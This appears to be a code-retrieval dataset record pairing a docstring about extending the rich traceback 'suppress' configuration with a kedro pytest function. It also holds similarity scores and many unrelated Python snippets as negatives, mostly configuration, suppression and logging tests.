var_combination)", "def _run_computation(self):\n with self.swap(stats_jobs_continuous.StatisticsAggregator,\n 'get_statistics', self._mock_get_statistics):\n ModifiedUserImpactAggregator.start_computation()\n self.process_and_flush_pending_tasks()", "def zonal_stats_workflow():\n save_as = \"C:/Users/ginge/Documents/NatCap/GIS_local/USFS/replicate_4th_draft_12.4.18/summary/monthly_quickflow.csv\"\n scenario_dict = {\n 'pre-decline': \"C:/Users/ginge/Documents/NatCap/GIS_local/USFS/replicate_4th_draft_12.4.18/pre_decline\",\n 'post-decline': \"C:/Users/ginge/Documents/NatCap/GIS_local/USFS/replicate_4th_draft_12.4.18/post_decline\",\n }\n df_list = []\n for scenario in scenario_dict.iterkeys():\n results_dict = {\n 'scenario': [],\n 'month': [],\n 'sum_quickflow': [],\n }\n folder = scenario_dict[scenario]\n aoi_shp = os.path.join(folder, 'aggregated_results.shp')\n for month in xrange(1, 13):\n qf_raster = os.path.join(\n folder, 'intermediate_outputs', 'qf_{}.tif'.format(month))\n zonal_stats = pygeoprocessing.zonal_statistics(\n (qf_raster, 1), aoi_shp)\n sum_QF = zonal_stats[0]['sum']\n results_dict['scenario'].append(scenario)\n results_dict['month'].append(month)\n results_dict['sum_quickflow'].append(sum_QF)\n results_df = pandas.DataFrame(data=results_dict)\n df_list.append(results_df)\n combined_list = pandas.concat(df_list)\n combined_list.to_csv(save_as, index=False)", "def execute(self):\n # Ensure a true no-op (in particular, we don't want to GET the feed) if\n # there are no Subtasks\n if not any([self._tx_by_uuid, self._common_tx.subtasks,\n self._post_exec]):\n LOG.info(_(\"FeedTask %s has no Subtasks; no-op execution.\"),\n self.name)\n return\n rets = {'wrapper_task_rets': {}}\n try:\n # Calling .wrapper_tasks will cause the feed to be fetched and\n # WrapperTasks to be replicated, if not already done. Only do this\n # if there exists at least one WrapperTask with Subtasks.\n # (NB: It is legal to have a FeedTask that *only* has post-execs.)\n if self._tx_by_uuid or self._common_tx.subtasks:\n pflow = tf_uf.Flow(\"%s_parallel_flow\" % self.name)\n pflow.add(*self.wrapper_tasks.values())\n # Execute the parallel flow now so the results can be provided\n # to any post-execs.\n rets['wrapper_task_rets'] = self._process_subtask_rets(\n tf_eng.run(\n pflow, engine='parallel',\n executor=ContextThreadPoolExecutor(self.max_workers)))\n if self._post_exec:\n flow = tf_lf.Flow('%s_post_execs' % self.name)\n flow.add(*self._post_exec)\n eng = tf_eng.load(flow, store=rets)\n eng.run()\n rets = eng.storage.fetch_all()\n except tf_ex.WrappedFailure as wfail:\n LOG.error(_(\"FeedTask %s experienced multiple exceptions. They \"\n \"are logged individually below.\"), self.name)\n for fail in wfail:\n LOG.exception(fail.pformat(fail.traceback_str))\n raise ex.MultipleExceptionsInFeedTask(self.name, wfail)\n\n # Let a non-wrapped exception (which happens if there's only one\n # element in the feed) bubble up as-is.\n\n return rets", "def run(self, **kwargs):\n for repl in self.replicas:\n self.log.info('-'*50)\n self.log.info(\"Running %s analysis...\"%repl.name)\n self.__submitReplica(repl, **kwargs)\n self.log.info('-'*50)", "def run(self,measurements,actions):\n raise NotImplementedError" ]
[ "0.63525146", "0.5947928", "0.5696838", "0.5634496", "0.5608928", "0.56013626", "0.5599923", "0.5587855", "0.55873567", "0.55794024", "0.5530784", "0.551449", "0.55136603", "0.54978615", "0.5480734", "0.5459616", "0.5439924", "0.5439924", "0.54238594", "0.54176867", "0.5402115", "0.5400623", "0.54001963", "0.5382854", "0.53654504", "0.5365022", "0.5353128", "0.5334745", "0.53345764", "0.5334531", "0.5328001", "0.5325458", "0.531181", "0.5309782", "0.5297234", "0.5280693", "0.52670294", "0.5261316", "0.5226375", "0.5225141", "0.5214236", "0.5201919", "0.5195302", "0.51891285", "0.51810586", "0.51546", "0.51538295", "0.5145682", "0.5143882", "0.5137166", "0.51362777", "0.51362777", "0.51362777", "0.5118521", "0.5117696", "0.51171213", "0.5114591", "0.5111028", "0.5108454", "0.51080686", "0.51007867", "0.5090646", "0.50812227", "0.50798327", "0.50714743", "0.50709766", "0.5070688", "0.50664467", "0.50656885", "0.50637555", "0.5058226", "0.5052036", "0.5048573", "0.5044786", "0.50415546", "0.50366896", "0.50355357", "0.5033161", "0.503115", "0.50226706", "0.5022072", "0.5021281", "0.5020987", "0.5019065", "0.5016951", "0.5014145", "0.5013978", "0.50099474", "0.5007657", "0.50053877", "0.5005315", "0.500085", "0.49952152", "0.49951133", "0.49899662", "0.49889833", "0.49844626", "0.49768695", "0.4973292", "0.49727687" ]
0.54119116
20
Test that the configuration is not overridden but extended for `suppress`
import sys
from pathlib import Path

def test_rich_traceback_configuration_extend_suppress(mocker, default_logging_config):
    # `mocker` and `default_logging_config` are pytest fixtures; LOGGING is the
    # project-level logging configurator from the surrounding test module.
    import click

    rich_traceback_install = mocker.patch("rich.traceback.install")
    rich_pretty_install = mocker.patch("rich.pretty.install")
    sys_executable_path = str(Path(sys.executable).parent)
    traceback_install_defaults = {"suppress": [click, sys_executable_path]}

    fake_path = "dummy"
    rich_handler = {
        "class": "kedro.logging.RichHandler",
        "rich_tracebacks": True,
        "tracebacks_suppress": [fake_path],
    }

    test_logging_config = default_logging_config
    test_logging_config["handlers"]["rich"] = rich_handler
    LOGGING.configure(test_logging_config)

    # The handler-level `tracebacks_suppress` entries must be appended to the
    # install defaults, not replace them.
    expected_install_defaults = traceback_install_defaults
    expected_install_defaults["suppress"].extend([fake_path])

    rich_traceback_install.assert_called_with(**expected_install_defaults)
    rich_pretty_install.assert_called_once()
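# A minimal sketch (an assumption, not necessarily kedro's exact implementation)
# of the handler behaviour the test above asserts: handler-level
# `tracebacks_suppress` entries are appended to a default suppress list before
# `rich.traceback.install` is called, so the defaults are extended rather than
# overridden.
import sys
from pathlib import Path

import click
import rich.pretty
import rich.traceback
from rich.logging import RichHandler as _BaseRichHandler


class RichHandler(_BaseRichHandler):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        rich.pretty.install()
        # Always suppress click internals and the interpreter's bin directory.
        defaults = {"suppress": [click, str(Path(sys.executable).parent)]}
        if self.rich_tracebacks:
            # Extend the default suppress list with handler-level entries.
            defaults["suppress"].extend(kwargs.get("tracebacks_suppress", []))
            rich.traceback.install(**defaults)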
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_suppress_import(self):\n logging.info(\"testing suppress import\")\n\n generated_file = os.path.join(self._test_workspace,\n \"generated.suppress\")\n\n extract_cmd = ['CodeChecker', 'parse',\n os.path.join(self._test_workspace, \"reports\"),\n \"--suppress\", generated_file,\n \"--export-source-suppress\"\n ]\n\n ret = call_cmd(extract_cmd,\n self._test_project_path,\n env.test_env(self._test_workspace))\n self.assertEqual(ret, 2, \"Failed to generate suppress file.\")\n\n codechecker_cfg = env.import_test_cfg(\n self._test_workspace)['codechecker_cfg']\n\n product_url = env.parts_to_url(codechecker_cfg)\n import_cmd = ['CodeChecker', 'cmd', 'suppress', '-i', generated_file,\n '--url', product_url, self._run_name]\n\n print(import_cmd)\n ret = call_cmd(import_cmd,\n self._test_project_path,\n env.test_env(self._test_workspace))\n self.assertEqual(ret, 0, \"Failed to import suppress file.\")", "def discard_config(self):\n raise NotImplementedError", "def pytest_ignore_collect(path: Any, config: Config) -> bool:\n if config.option.functional:\n return True\n if config.option.markexpr and \"wip\" in config.option.markexpr:\n return False # collect when looking for markers\n return not (config.option.integration or config.option.integration_only)", "def _suppress(self, key):\n return key in self.SUPPRESS", "def test_single_git_override_disabled_deprecations(self):\n for prefix in ['', 'git-']:\n os.environ['GBP_DISABLE_SECTION_DEPRECTATION'] = 'true'\n parser = GbpOptionParser('%scmd2' % prefix)\n self.assertEqual(parser.config['single_git_override_option1'], 'single_git_override_value1')\n for line in range(0, 2):\n self._check_log_empty()\n os.environ.pop('GBP_DISABLE_SECTION_DEPRECTATION')", "def test_disable_retainUnsent():\n config_info = read_config()\n config_info['retainUnsent'] = False\n open(config_file, 'w').close()\n with open(config_file, 'r+') as conf:\n conf.write(json.dumps(config_info))\n config_info = read_config()\n\n assert config_info['retainUnsent'] is False", "def test_exclude_include_overlapping_ambiguous_and_includes_excluded_init_overridden_file_line():\n\n class iitem(ConfigItem):\n def __init__(self, mc_include, mc_exclude):\n super().__init__(mc_include=mc_include, mc_exclude=mc_exclude)\n\n with raises(ConfigException) as exinfo:\n class X():\n def __init__(self):\n iitem(mc_exclude=[dev2], mc_include=[dev2, prod])\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with root(aa=1):\n X()\n\n exp = \"Env('dev2') is specified in both include and exclude, with no single most specific group or direct env:\"\n assert exp in str(exinfo.value)", "def default_confoverrides(cls, config):\n return _apply_confoverride_to_class(cls, config, 1)", "def is_ignored(self):", "def override_configuration():\n\n bool_config_override(\"BUILDTEST_MODULE_FORCE_PURGE\")\n\n if os.environ.get(\"BUILDTEST_SPIDER_VIEW\"):\n config_opts[\"BUILDTEST_SPIDER_VIEW\"] = os.environ[\"BUILDTEST_SPIDER_VIEW\"]\n\n if os.environ.get(\"BUILDTEST_SUCCESS_THRESHOLD\"):\n threshold = float(os.environ.get(\"BUILDTEST_SUCCESS_THRESHOLD\"))\n\n if threshold >= 0.0 and threshold <= 1.0:\n config_opts[\"BUILDTEST_SUCCESS_THRESHOLD\"] = threshold", "def test_enable_retainUnsent():\n config_info = read_config()\n config_info['retainUnsent'] = True\n open(config_file, 'w').close()\n with open(config_file, 'r+') as conf:\n conf.write(json.dumps(config_info))\n config_info = read_config()\n\n assert config_info['retainUnsent'] is True", "def exclude_opts(cls) -> Tuple[str, ...]:\n return 
\"required\", \"print_config\", \"config\", \"ngpu\"", "def suppress(self):\n pass", "def test_defaults():\n config = Config(\n env_var='DO_NOT_USE',\n env_prefix='DO_NOT_USE',\n entry_point_name='DO_NOT_USE',\n )\n\n assert not config.keys()", "def test_configure_without_inheritance(self):\n\n @Configurable(conf=category('TEST', Parameter('test', value=True)))\n class BaseTest(object):\n \"\"\"base Class to configure.\"\"\"\n\n class Test(BaseTest):\n \"\"\"Class to configure.\"\"\"\n\n targets = Test()\n\n self.assertTrue(targets.test)", "def check_configuration(self, configuration):\n super(Pixiv_bot, self).check_configuration(configuration)", "def _check_config(self):", "def check_configuration(self, configuration):\n super(Hipchap, self).check_configuration(configuration)", "def _suppress_warnings():\n import warnings\n import sys\n import os\n if os.path.basename(sys.argv[0]) != \"trial\":\n warnings.simplefilter(\"ignore\")", "def pytest_configure(config):\n disabled = ['gensim.models.word2vec', 'faker.factory']\n for name in disabled:\n logger = logging.getLogger(name)\n logger.propagate = False", "async def test_skipped_already_silenced(self):\n subtests = (\n (\n False,\n MockTextChannel(),\n PermissionOverwrite(\n send_messages=False,\n add_reactions=False,\n create_private_threads=False,\n create_public_threads=False,\n send_messages_in_threads=False\n )\n ),\n (\n True,\n MockTextChannel(),\n PermissionOverwrite(\n send_messages=True,\n add_reactions=True,\n create_private_threads=True,\n create_public_threads=True,\n send_messages_in_threads=True\n )\n ),\n (\n True,\n MockTextChannel(),\n PermissionOverwrite(\n send_messages=False,\n add_reactions=False,\n create_private_threads=False,\n create_public_threads=False,\n send_messages_in_threads=False\n )\n ),\n (False, MockVoiceChannel(), PermissionOverwrite(connect=False, speak=False)),\n (True, MockVoiceChannel(), PermissionOverwrite(connect=True, speak=True)),\n (True, MockVoiceChannel(), PermissionOverwrite(connect=False, speak=False)),\n )\n\n for contains, channel, overwrite in subtests:\n with self.subTest(contains=contains, is_text=isinstance(channel, MockTextChannel), overwrite=overwrite):\n self.cog.scheduler.__contains__.return_value = contains\n channel.overwrites_for.return_value = overwrite\n\n self.assertFalse(await self.cog._set_silence_overwrites(channel))\n channel.set_permissions.assert_not_called()", "def setup_class(self):\n\n global TEST_WORKSPACE\n TEST_WORKSPACE = env.get_workspace('suppress')\n\n os.environ['TEST_WORKSPACE'] = TEST_WORKSPACE\n\n test_project = 'suppress'\n\n test_config = {}\n\n project_info = project.get_info(test_project)\n\n test_proj_path = os.path.join(TEST_WORKSPACE, \"test_proj\")\n shutil.copytree(project.path(test_project), test_proj_path)\n\n project_info['project_path'] = test_proj_path\n\n test_config['test_project'] = project_info\n\n # Generate a suppress file for the tests.\n suppress_file = os.path.join(TEST_WORKSPACE, 'suppress_file')\n if os.path.isfile(suppress_file):\n os.remove(suppress_file)\n _generate_suppress_file(suppress_file)\n\n test_env = env.test_env(TEST_WORKSPACE)\n\n codechecker_cfg = {\n 'suppress_file': None,\n 'skip_list_file': None,\n 'check_env': test_env,\n 'workspace': TEST_WORKSPACE,\n 'checkers': [],\n 'analyzers': ['clangsa', 'clang-tidy']\n }\n\n ret = project.clean(test_project, test_env)\n if ret:\n sys.exit(ret)\n\n # Start or connect to the running CodeChecker server and get connection\n # details.\n print(\"This test uses a CodeChecker 
server... connecting...\")\n server_access = codechecker.start_or_get_server()\n server_access['viewer_product'] = 'suppress'\n codechecker.add_test_package_product(server_access, TEST_WORKSPACE)\n\n # Extend the checker configuration with the server access.\n codechecker_cfg.update(server_access)\n\n test_project_name = project_info['name'] + '_' + uuid.uuid4().hex\n\n ret = codechecker.check_and_store(codechecker_cfg,\n test_project_name,\n project.path(test_project))\n\n if ret:\n sys.exit(1)\n print(\"Analyzing the test project was successful.\")\n test_project_name_dup = test_project_name + \"_duplicate\"\n ret = codechecker.store(codechecker_cfg, test_project_name_dup)\n\n codechecker_cfg['run_names'] = [test_project_name,\n test_project_name_dup]\n test_config['codechecker_cfg'] = codechecker_cfg\n\n env.export_test_cfg(TEST_WORKSPACE, test_config)", "def check_config(config):\n pass", "def exclude(self, *args, **kwargs):", "def test_single_override(self):\n for prefix in ['', 'git-', 'gbp-']:\n parser = GbpOptionParser('%scmd1' % prefix)\n self.assertEqual(parser.config['single_override_option1'], 'single_override_value1')\n # No deprecation warning since the test1.conf section is [cmd1]\n self._check_log_empty()", "def _suppressions(self) -> List:\n sonar, sonar_id = self._metric_source, self._sonar_id()\n return [\n (sonar.false_positives(sonar_id), sonar.false_positives_url(sonar_id),\n \"Gemarkeerd als false positive in SonarQube\"),\n (sonar.wont_fix(sonar_id), sonar.wont_fix_url(sonar_id),\n \"Gemarkeerd als won't fix in SonarQube\"),\n (sonar.suppressions(sonar_id), sonar.suppressions_url(sonar_id),\n \"Gemarkeerd in de broncode met annotatie, commentaar (bijv. //NOSONAR) of pragma\")]", "def test_excess_settings(monkeypatch) -> None: # noqa: TYP001\n monkeypatch.setattr(django_settings, 'SWAGGER_TESTER', {'bad_setting': 5})\n with pytest.raises(ImproperlyConfigured, match='is not a valid setting for the django-swagger-tester module'):\n SwaggerTesterSettings()", "def ignore_non_actual_section(): # noqa: D416", "def test_check_exclude_none(self):\n\n self.assertTrue(PostfixExclude([]).check(self.file_gitignore))\n self.assertTrue(PostfixExclude([]).check(self.file_py))\n self.assertTrue(PostfixExclude([]).check(self.file_authors))\n self.assertTrue(PostfixExclude([]).check(self.file__init__))\n self.assertTrue(PostfixExclude([]).check(self.file_bin))", "def test_skip_with_decorator_and_reason():\n pass", "def settings():\n raise NotImplementedError # pragma: nocoverage", "def test_config_no_biopython(monkeypatch):\n monkeypatch.setattr(core, 'HAVE_BIOPYTHON', False)\n assert core.HAVE_BIOPYTHON is False\n args = Namespace(extended_validation='all')\n with pytest.raises(ValueError):\n core.Config.from_args(args)", "def test_config_merging_missing():\n toml = StringIO(\n dedent(\n \"\"\"\\\n [tool.vulture]\n verbose = true\n ignore_names = [\"name1\"]\n \"\"\"\n )\n )\n cliargs = [\n \"cli_path\",\n ]\n result = make_config(cliargs, toml)\n assert result[\"verbose\"] is True\n assert result[\"ignore_names\"] == [\"name1\"]", "def checkConf(settings, stanza=None, confInfo=None, throwExceptionOnError=False): \n # Below is a list of the required fields. The entries in this list will be removed as they\n # are observed. 
An empty list at the end of the config check indicates that all necessary\n # fields where provided.\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n \n if stanza is not None and confInfo is not None:\n # Add each of the settings\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n \n # Key is eai; Set meta \n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n \n # Key is eai; userName/appName\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n \n # Key is not proper\n else:\n pass\n \n # Check each of the settings individually\n logger.info(\"Checking general settings for the '%s' suppression\", stanza)\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n # Check the disabled/selected value\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n \n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n except ValueError:\n raise InvalidParameterValueException(key, val, \"must be a valid boolean\")\n \n elif key in Suppressions.REQUIRED_PARAMS:\n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n elif key in Suppressions.VALID_PARAMS:\n pass\n \n # Key is eai\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n \n # Key is not proper\n else:\n if throwExceptionOnError:\n raise UnsupportedParameterException()\n \n else:\n logger.warn(\"The configuration for '%s' contains an unsupported parameter: %s\", stanza, key)\n\n # Error if some of the required fields were not provided\n if len(required_fields) > 0:\n raise InvalidConfigException('The following fields must be defined in the configuration but were not: ' + ', '.join(required_fields).strip())", "def confoverrides(**config):\n def actual_decorator(meth_or_cls):\n if not config:\n return meth_or_cls\n\n if isclass(meth_or_cls):\n return _apply_confoverride_to_class(meth_or_cls, config, 2)\n else:\n return pytest.mark.exhale(3, confoverrides=config)(meth_or_cls)\n\n return actual_decorator", "def suppressWarningClass(clazz):\n _enabled.insert(0, (clazz, 0))", "def suppress_error(self):\n return self._suppress_error", "def pytest_unconfigure(config):\n if config.option.intercept_remote:\n global mpatch\n mpatch.undo()\n intercept_dump(config)", "def suppress_exceptions(cls, value=True):\n cls._suppress_exceptions = value", "def test_exclude_include_overlapping_for_configitem_with_overridden_mc_select_envs(capsys):\n errorline = [None]\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA():\n with McSelectOverrideItem() as it:\n errorline[0] = next_line_num()\n it.mc_select_envs(exclude=[dev1], include=[dev1, pp])\n\n assert \"There was 1 error when defining item\" in str(exinfo.value)\n _sout, serr = capsys.readouterr()\n print(serr)\n\n ce(errorline[0], serr, exp_dev1_ambiguous)\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA():\n with McSelectOverrideItem2() as it:\n errorline[0] = next_line_num()\n it.mc_select_envs(exclude=[dev1], 
include=[dev1, pp])\n\n assert \"There was 1 error when defining item\" in str(exinfo.value)\n _sout, serr = capsys.readouterr()\n print(serr)\n\n ce(errorline[0], serr, exp_dev1_ambiguous)", "def clear_parameter_run_config_collisions(self) -> None:\n if not self.override_config:\n return\n keys = [key for key in self.override_config.keys()]\n for key in keys:\n if self.override_args.get(key):\n del self.override_config[key]", "def test_exclude_include_overlapping_ambiguous_single_env_init(capsys):\n errorline = [None]\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA(aa=0):\n errorline[0] = next_line_num()\n item(mc_exclude=[dev1], mc_include=[dev1, pp])\n\n sout, _serr = capsys.readouterr()\n assert sout == \"\"\n\n assert exp_dev1_ambiguous in str(exinfo.value)\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA(aa=0):\n errorline[0] = next_line_num()\n item(mc_exclude=[pp, dev1], mc_include=[dev1])\n\n assert exp_dev1_ambiguous in str(exinfo.value)", "def test_bug_2247(self):\n\n code, out, err = self.t(\"rc.color:0 add test\")\n self.assertIn(\"Configuration override\", err)\n\n # Once rc.verbose:nothing is set, no output about configuration overrides should appear\n code, out, err = self.t(\"rc.verbose:nothing add test\")\n self.assertNotIn(\"Configuration override\", err)\n\n code, out, err = self.t(\"rc.color:0 rc.verbose:nothing add test\")\n self.assertNotIn(\"Configuration override\", err)\n\n code, out, err = self.t(\"rc.verbose:nothing rc.color:0 add test\")\n self.assertNotIn(\"Configuration override\", err)", "def test_no_adapter_opts(self):\n self.oslo_config_dict['heat'] = None\n self.assert_service_disabled(\n 'orchestration',\n \"Encountered an exception attempting to process config for \"\n \"project 'heat' (service type 'orchestration'): no such option\",\n )", "def test_invalid_adapter_opts(self):\n self.oslo_config_dict['heat'] = {\n 'interface': 'public',\n 'valid_interfaces': 'private',\n }\n self.assert_service_disabled(\n 'orchestration',\n \"Encountered an exception attempting to process config for \"\n \"project 'heat' (service type 'orchestration'): interface and \"\n \"valid_interfaces are mutually exclusive.\",\n )", "def excluded(self):\n\n # A few variables for convenience of writing the method\n spec = self.spec\n conf = self.module.configuration(self.name)\n\n # Compute the list of include rules that match\n # DEPRECATED: remove 'whitelist' in v0.20\n include_rules = get_deprecated(conf, \"include\", \"whitelist\", [])\n include_matches = [x for x in include_rules if spec.satisfies(x)]\n\n # Compute the list of exclude rules that match\n # DEPRECATED: remove 'blacklist' in v0.20\n exclude_rules = get_deprecated(conf, \"exclude\", \"blacklist\", [])\n exclude_matches = [x for x in exclude_rules if spec.satisfies(x)]\n\n # Should I exclude the module because it's implicit?\n # DEPRECATED: remove 'blacklist_implicits' in v0.20\n exclude_implicits = get_deprecated(conf, \"exclude_implicits\", \"blacklist_implicits\", None)\n installed_implicitly = not spec._installed_explicitly()\n excluded_as_implicit = exclude_implicits and installed_implicitly\n\n def debug_info(line_header, match_list):\n if match_list:\n msg = \"\\t{0} : {1}\".format(line_header, spec.cshort_spec)\n tty.debug(msg)\n for rule in match_list:\n tty.debug(\"\\t\\tmatches rule: {0}\".format(rule))\n\n debug_info(\"INCLUDE\", 
include_matches)\n debug_info(\"EXCLUDE\", exclude_matches)\n\n if excluded_as_implicit:\n msg = \"\\tEXCLUDED_AS_IMPLICIT : {0}\".format(spec.cshort_spec)\n tty.debug(msg)\n\n is_excluded = exclude_matches or excluded_as_implicit\n if not include_matches and is_excluded:\n return True\n\n return False", "def test_exclude_include_overlapping_ambiguous_and_includes_excluded_init(capsys):\n\n errorline = [None]\n exp = \"Env('dev2') is specified in both include and exclude, with no single most specific group or direct env:\"\n\n with raises(ConfigException) as exinfo:\n @mc_config(ef, load_now=True)\n def config(rt):\n with root(aa=1):\n with ritem('a', mc_exclude=[prod]) as ri:\n ri.anattr = 1\n ri.anotherattr = 2\n errorline[0] = next_line_num()\n item(mc_exclude=[dev2], mc_include=[dev2, prod])\n\n sout, _serr = capsys.readouterr()\n assert sout == \"\"\n\n assert exp in str(exinfo.value)", "def suppress(self):\n return Suppress(self)", "def test_exclude_include_overlapping_for_configitem(capsys):\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA() as cr:\n cr.aa = 1\n with item(mc_include=[g_dev12_3, pp], mc_exclude=[g_dev12]) as it:\n it.setattr('anattr', pp=1, g_dev12_3=2)\n it.setattr('b', pp=1, dev3=0)\n it.setattr('anotherattr', default=111)\n return cr\n\n cr = config(prod).ItemWithAA\n assert cr.aa == 1\n assert not cr.item\n assert compare_json(cr, _include_exclude_for_configitem_expected_json, test_excluded=True)\n\n cr = config(dev1).ItemWithAA\n assert cr.aa == 1\n assert not cr.item\n\n cr = config(dev2).ItemWithAA\n assert cr.aa == 1\n assert not cr.item\n\n cr = config(dev3).ItemWithAA\n assert cr.aa == 1\n assert cr.item\n assert cr.item.anattr == 2\n assert cr.item.b == 0\n assert cr.item.anotherattr == 111\n\n cr = config(pp).ItemWithAA\n assert cr.aa == 1\n assert cr.item\n assert cr.item.anattr == 1\n assert cr.item.b == 1\n assert cr.item.anotherattr == 111", "def cmdline_args_override(\n config: Config, args: Namespace, ignore: Optional[Union[str, List[str]]] = None\n) -> None:\n if isinstance(ignore, str):\n ignore = [ignore]\n else:\n ignore = ignore or []\n\n for key, value in vars(args).items():\n if key not in ignore and value is not None:\n config.__setitem__(key, value)", "def test_skipif_false():\n pass", "def suppress(self, t, w=None):\n return super(SmartCentroidPublisher, self).suppress(t, w)", "def test_exclude_ip_ban(self):\n pass", "def test_required_config(self, ckan_config, monkeypatch, option):\n monkeypatch.delitem(ckan_config, option)\n plugin = p.get_plugin(\"cloudstorage\")\n with pytest.raises(RuntimeError, match=\"configuration option\"):\n plugin.configure(ckan_config)", "def ignore_all(self):\n # type: () -> bool\n return False", "def test_airflow_config_output_does_not_contain_providers_when_excluded(self):\n CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)\n CONFIG_FILE.unlink(missing_ok=True)\n CONFIG_FILE.touch(exist_ok=True)\n result = subprocess.run(\n [sys.executable, \"-m\", \"airflow\", \"config\", \"list\", \"--exclude-providers\"],\n env={\"PYTHONPATH\": os.pathsep.join(sys.path)},\n check=False,\n text=True,\n capture_output=True,\n )\n assert result.returncode == 0\n assert \"celery_config_options\" not in result.stdout", "def test_exclude_include_overlapping_resolved_with_exclude_for_configitem():\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA() as cr:\n cr.aa = 1\n with item(mc_include=[g_dev12, pp], mc_exclude=[dev2, g_dev23]) as it:\n it.setattr('anattr', pp=1, g_dev12_3=2)\n 
it.setattr('b', pp=1)\n it.setattr('anotherattr', default=111)\n return cr\n\n cr = config(prod).ItemWithAA\n assert not cr.item\n assert compare_json(cr, _include_exclude_for_configitem_expected_json, test_excluded=True)\n\n cr = config(dev1).ItemWithAA\n assert cr.item\n\n cr = config(dev2).ItemWithAA\n assert not cr.item\n\n cr = config(dev3).ItemWithAA\n assert not cr.item\n\n cr = config(pp).ItemWithAA\n assert cr.item\n assert cr.item.anattr == 1\n assert cr.item.b == 1\n assert cr.item.anotherattr == 111", "def test_checkCustoms(self):\n self.failUnlessEqual(self.nice.opts['myflag'], \"PONY!\")\n self.failUnlessEqual(self.nice.opts['myparam'], \"Tofu WITH A PONY!\")", "def test_cli_exclude_use_cfg(cleanup_test_path_multiples,\n generate_options_exclude,\n flag_tag,\n flag_exclude,\n flag_config):\n config_path = generate_options_exclude[0]\n src_path = generate_options_exclude[1]\n target_path = generate_options_exclude[2]\n tags = generate_options_exclude[3:]\n working_path = os.path.commonpath([src_path, target_path])\n exclude = os.path.basename(target_path)\n\n # read in original files first\n og_contents = read_python_files_as_dict(src_path)\n\n # run with exclude options from the command line first\n cmd = [\"pytag\", working_path, flag_exclude, exclude, flag_tag, *tags]\n subprocess.run(cmd, check=True)\n expected_contents = read_python_files_as_dict(src_path)\n\n # restore the files for a second run\n write_file_from_dict(og_contents)\n\n # run with exclude options from config file\n cmd = [\"pytag\", flag_config, config_path]\n subprocess.run(cmd, check=True)\n actual_contents = read_python_files_as_dict(src_path)\n\n for name in actual_contents:\n actual = actual_contents[name]\n expected = expected_contents[name]\n assert actual == expected", "def run_side_effects(self, label, *args, **kwargs):\n if self._suppress or settings.TEST_MODE:\n self.suppressed_side_effect.send(Registry, label=label)\n else:\n self._run_side_effects(label, *args, **kwargs)", "def test_skipif_true():\n pass", "def test_no_config_keyword(self):\n args = self.get_args()\n config = {\n \"site\": {\n \"username\": \"\",\n \"name\": \"\",\n \"ip_address\": \"\",\n \"password\": \"\",\n \"local\": \"\",\n \"use_https\": \"\"\n }\n }\n temp = sys.stdout\n fake_out = FakeStdio()\n sys.stdout = fake_out\n\n config_filename = 'testsuite_cfg.json'\n args.config = config_filename\n config_file = open(config_filename, 'w')\n config_file.write(str(json.dumps(config)))\n config_file.close()\n\n execute_tool(args, test_mode=True)\n sys.stdout = temp\n self.assertTrue(fake_out.verify_output(['%% Invalid configuration file', '\\n']))", "def suppress_analyze(more_exclusions=None):\n return api.override_step_data(\n 'read filter exclusion spec',\n api.json.output({\n 'base': {\n 'exclusions': ['f.*'] + (more_exclusions or []),\n },\n 'chromium': {\n 'exclusions': [],\n },\n })\n )", "def no_additional_complaints() -> None:\n logging.getLogger(\"asyncio\").setLevel(\"CRITICAL\")\n warnings.simplefilter(\"ignore\")", "def check_config(cfg):", "def test_using_ini_config(checker, capsys):\n phmdoctest.main.generate_using(config_file=Path(\"tests/generate_quietly.ini\"))\n assert len(capsys.readouterr().out) == 0", "def _canDisable(func):\n def wrapper(*args, **kwargs):\n if _DISABLE_ASSERTIONS == 0:\n return func(*args, **kwargs)\n return wrapper", "def test_if_no_elimination():\n\n def f(x):\n if x:\n a = 1\n else:\n a = 2\n\n check_component(prune_cfg, f, dict(y=2))", "def test_check(self):\n\n 
self.assertTrue(PostfixExclude().check(self.file_gitignore))\n self.assertTrue(PostfixExclude().check(self.file_py))\n self.assertTrue(PostfixExclude().check(self.file_authors))\n self.assertTrue(PostfixExclude().check(self.file__init__))\n self.assertTrue(PostfixExclude().check(self.file_bin))", "def test_deprecated_logger_without_config_attributes(\n caplog: pytest.LogCaptureFixture,\n) -> None:\n file: str = \"configuration.yaml\"\n line: int = 54\n replacement = f\"'mars' option near {file}:{line} is deprecated\"\n config = OrderedDict([(\"mars\", \"blah\")])\n\n cv.deprecated(\"mars\", replacement_key=\"jupiter\", default=False)(config)\n\n assert len(caplog.records) == 1\n assert replacement not in caplog.text\n assert (\n \"The 'mars' option is deprecated, please replace it with 'jupiter'\"\n ) in caplog.text\n\n caplog.clear()\n assert len(caplog.records) == 0", "def __init__(self, *args, **kwargs):\n # skip\n self.skip_whitelist = set(kwargs.pop('skip_whitelist', []))\n self.skip_blacklist = set(kwargs.pop('skip_blacklist', []))\n # ignore\n self.ignore_whitelist = set(kwargs.pop('ignore_whitelist', 